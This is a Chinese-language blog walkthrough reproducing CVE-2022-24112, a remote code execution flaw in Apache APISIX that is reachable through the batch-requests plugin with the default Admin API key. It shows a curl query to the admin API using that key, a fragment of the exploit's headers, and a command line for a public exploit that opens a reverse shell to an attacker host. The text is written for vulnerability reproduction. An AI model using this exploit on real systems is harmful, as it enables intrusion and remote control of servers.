CVE-2022-24112 Apache APISIX 命令执行漏洞复现

本文介绍: 如果用户使用 Apac he APISIX 默认配置（启用 Ad min API ，使用默认 Ad min Ke y 且没有额外分配管理端口），攻击者可以通过 batch–requests 插件调用 Ad min API ，导致远程代码执行。Apac he APISIX 是 Apac he 软件基金会下的云原生 API 网关，它兼具动态、实时、高性能等特点，提供了负载均衡、动态上游、灰度发布（金丝雀发布）、服务熔断、身份认证、可观测性等丰富的流量管理功能。登陆后台可以看到其添加的一条路由列表，在。

在这里插入图片描述

Apac he APISIX 是 Apac h e 软件基金会下的云原生 API 网关，它兼具动态、实时、高性能等特点，提供了负载均衡、动态上游、灰度发布（金丝雀发布）、服务熔断、身份认证、可观测性等丰富的流量管理功能

在启用 Ap a ch e APISIX batch–requests 插件后，攻击者通过 batch–requests 插件绕过 Ap ac h e APISIX 数据面板的 IP 限制（如绕过 IP 黑白名单限制）。如果用户使用 Ap ac he APISIX 默认配置（启用 Ad min API ，使用默认 Ad min Key 且没有额外分配管理端口），攻击者可以通过 batch–requests 插件调用 Ad min API ，导致远程代码执行

漏洞环境：CVE-2022-24112：Apache APISIX 命令执行漏洞

环境启动后访问 9000 端口，可以使用 curl 命令确认漏洞存在

ocean@OceandeMBP ~ % curl 'http://192.168.186.148:9080/apisix/admin/routes?api_key=edd1c9f034335f136f87ad84b625c8f1' -i
HTTP/1.1 200 OK
Date: Fri, 24 Mar 2023 03:27:45 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Server: APISIX/2.12.0
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
Access-Control-Expose-Headers: *
Access-Control-Max-Age: 3600

{"action":"get","count":0,"node":{"dir":true,"key":"/apisix/routes","nodes":{}}}

p oc：https://github.com/t ws ept ian/cve-2022-24112

        json_data = {
            'headers': {
                'X-Real-IP': '{}:8080'.format(target_ip),
                'X-API-KEY': 'edd1c9f034335f136f87ad84b625c8f1',
                'Content-Type': 'application/json',
            }

然后使用PUT请求添加路由，触发filter_func()执行其中的lua 代码，利用上述EXP进行攻击，命令格式如下：

python3 exp.py -t 受害者主机 -p 服务运行的端口 -L 攻击者主机 -P 接受反弹Shell的端口

登陆后台可以看到其添加的一条路由列表，在filter_func()函数中，调用了lua的系统目录执行语句os.execute()进行反弹 shell

显示所有内容

声明：本站所有文章，如无特殊说明或标注，均为本站原创发布。任何个人或组织，在未征得本站同意时，禁止复制、盗用、采集、发布本站内容到任何网站、书籍等各类媒体平台。如若本站内容侵犯了原著者的合法权益，可联系我们进行处理。

CVE-2022-24112 Apac he APISIX 命令 执行 漏洞

发表回复取消回复

CVE-2022-24112 Apache APISIX 命令执行漏洞

相关文章

发表回复 取消回复

CVE-2022-24112 Apac he APISIX 命令执行漏洞

发表回复取消回复